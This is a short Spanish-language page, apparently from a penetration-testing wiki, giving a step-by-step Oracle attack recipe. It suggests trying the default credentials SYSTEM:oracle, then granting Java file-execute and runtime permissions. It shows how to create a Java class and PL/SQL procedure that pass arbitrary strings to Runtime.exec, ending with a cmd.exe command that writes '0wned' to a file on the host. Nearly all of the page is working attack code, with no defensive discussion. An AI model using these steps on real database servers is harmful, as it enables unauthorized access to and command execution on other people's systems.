Oracle

Probar credenciales por defecto:

SYSTEM:oracle

Run OS Commands via Java

Una vez que se tenga acceso asignarse permisos:

grant javasyspriv to SYSTEM;

begin
  dbms_java.grant_permission
      ('SCOTT',
       'java.io.FilePermission',
       '<<ALL FILES>>',
       'execute');
  dbms_java.grant_permission
      ('SCOTT',
       'java.lang.RuntimePermission',
       '*',
       'writeFileDescriptor' );
end;

Una vez se tenga esos permisos crear el objeto java

create or replace and resolve java source named "JAVACMD" ASimport java.lang.*;import java.io.*;public class JAVACMD{ public static void execCommand (String command) throws IOException { Runtime.getRuntime().exec(command);} };

Crear el procedimiento:

create or replace procedure javacmdproc (p_command in varchar2)as language java name 'JAVACMD.execCommand (java.lang.String)';

Ejecutar los comandos deseados:

exec javacmdproc('cmd.exe /c echo 0wned > c:\rds4.txt');

PreviousNginx misconfigurations NextAdvanced CORS Exploitation Techniques

Last updated 2 years ago